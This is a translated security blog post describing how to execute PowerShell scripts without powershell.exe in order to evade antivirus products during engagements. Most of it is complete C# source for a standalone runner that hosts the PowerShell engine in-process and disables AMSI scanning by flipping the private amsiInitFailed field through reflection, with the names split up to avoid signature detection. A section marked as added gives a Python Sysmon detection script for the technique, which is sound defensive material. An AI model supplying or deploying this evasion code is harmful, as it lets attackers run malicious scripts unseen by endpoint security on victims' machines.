None Powershell: executing PS commands without powershell.exe
2022-12-19 19:30:49 Author: 仙友道

Because AV products keep a very close watch on PowerShell, running a PS script during a real engagement requires a different route.
Earlier, even a PS command obfuscated like this was blocked by a certain "360" product, so the interception is evidently no longer based on regular expressions.
Reference (official documentation):
  • https://learn.microsoft.com/en-us/dotnet/api/System.Management.Automation.PowerShell?view=powershellsdk-7.2.0
The DLL is located at
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
System.Management.Automation.dll is a DLL shipped by Microsoft that exposes a simple interface for executing PowerShell commands:
PowerShell.Create().AddScript("get-process").Invoke();
powershell.exe itself calls into System.Management.Automation.dll to do the actual work, so during a penetration test a PowerShell script can be executed without going through powershell.exe, which bypasses the AV protection.
1. Create a Runspace
Runspace MyRunspace = RunspaceFactory.CreateRunspace();
2. Define a Pipeline
Pipeline MyPipeline = MyRunspace.CreatePipeline();
3. Add the script
MyPipeline.Commands.AddScript(script);
4. Run it
Collection<PSObject> outputs = MyPipeline.Invoke();
Demo
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Reflection;
using System.Text;

namespace Test
{
    class Program
    {
        static void Main(string[] args)
        {
            // Usage: NonePS.exe "<script text>"
            string runResult = RunScript(args[0]);
            Console.WriteLine(runResult);
        }

        // Runs the script through the PowerShell engine hosted inside this process.
        static string RunScript(string script)
        {
            Runspace MyRunspace = RunspaceFactory.CreateRunspace();
            MyRunspace.Open();
            Pipeline MyPipeline = MyRunspace.CreatePipeline();
            // From the original post: flips the private AmsiUtils.amsiInitFailed flag by reflection,
            // which makes the engine skip AMSI scanning for this process.
            MyRunspace.GetType().Assembly.GetType("Syste" + "m.Managem" + "ent.Autom" + "ation.AmsiU" + "tils")
                .GetField("am" + "siInitF" + "ailed", BindingFlags.NonPublic | BindingFlags.Static)
                .SetValue(null, true);
            MyPipeline.Commands.AddScript(script);
            MyPipeline.Commands.Add("Out-String");   // render all output as text
            Collection<PSObject> outputs = MyPipeline.Invoke();
            MyRunspace.Close();
            StringBuilder sb = new StringBuilder();
            foreach (PSObject pobject in outputs)
            {
                sb.AppendLine(pobject.ToString());
            }
            return sb.ToString();
        }
    }
}
Test screenshots:
Running it through powershell triggers a pop-up and is blocked;
running the remote PS script through NonePS.exe works normally.
Drawbacks:
A self-compiled program lacks the Microsoft signature that powershell carries.
If the DLL is not present on the target machine, the DLL has to be uploaded as well.
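Since any host process must load System.Management.Automation.dll (or its native image System.Management.Automation.ni.dll) to run the engine, the detection counterpart to the drawbacks above is to flag loads of that assembly by anything other than the standard PowerShell hosts. The script below is an added example, not part of the original post; it assumes Sysmon Event ID 7 (ImageLoad) telemetry exported as flattened key=value lines, and the sample records are constructed.

```python
import re

# Constructed Sysmon Event ID 7 (ImageLoad) records, flattened to key=value text
# as a SIEM export might look. These are sample lines, not real telemetry.
SAMPLE_EVENTS = [
    "EventID=7 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ImageLoaded=C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\"
    "v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll Signed=true",
    "EventID=7 Image=C:\\Users\\victim\\Desktop\\NonePS.exe "
    "ImageLoaded=C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\"
    "v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll Signed=true",
    "EventID=1 Image=C:\\Users\\victim\\Desktop\\NonePS.exe CommandLine=NonePS.exe get-process",
]

# Processes that are expected to load the PowerShell engine assembly.
KNOWN_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
ENGINE_DLLS = {"system.management.automation.dll", "system.management.automation.ni.dll"}

# key=value pairs; a value runs until the next " key=" so values may contain spaces.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Split a flattened key=value event line into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_unexpected_engine_hosts(lines):
    """Return (host exe, full image path) for each ImageLoad of the PowerShell
    engine assembly by a process that is not one of the known PowerShell hosts."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":
            continue  # only image-load events carry the loaded DLL
        if basename(ev.get("ImageLoaded", "")) not in ENGINE_DLLS:
            continue
        image = ev.get("Image", "")
        if basename(image) in KNOWN_HOSTS:
            continue
        hits.append((basename(image), image))
    return hits


if __name__ == "__main__":
    for host, image in find_unexpected_engine_hosts(SAMPLE_EVENTS):
        print(f"PowerShell engine loaded by non-standard host {host}: {image}")
```

The same filter also surfaces legitimate custom hosts (build tools, management agents), so allow-list those by path and signer before alerting.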

Article source: http://mp.weixin.qq.com/s?__biz=Mzg3NjYwNDgzMQ==&mid=2247485708&idx=1&sn=8b60d4f2a2143816bb1c27248eeb9f05&chksm=cf2ef5fcf8597cea4b89e73e78dcfabe1e8b929e9909b3f094c006d65e89e4bebe44d3c1db71#rd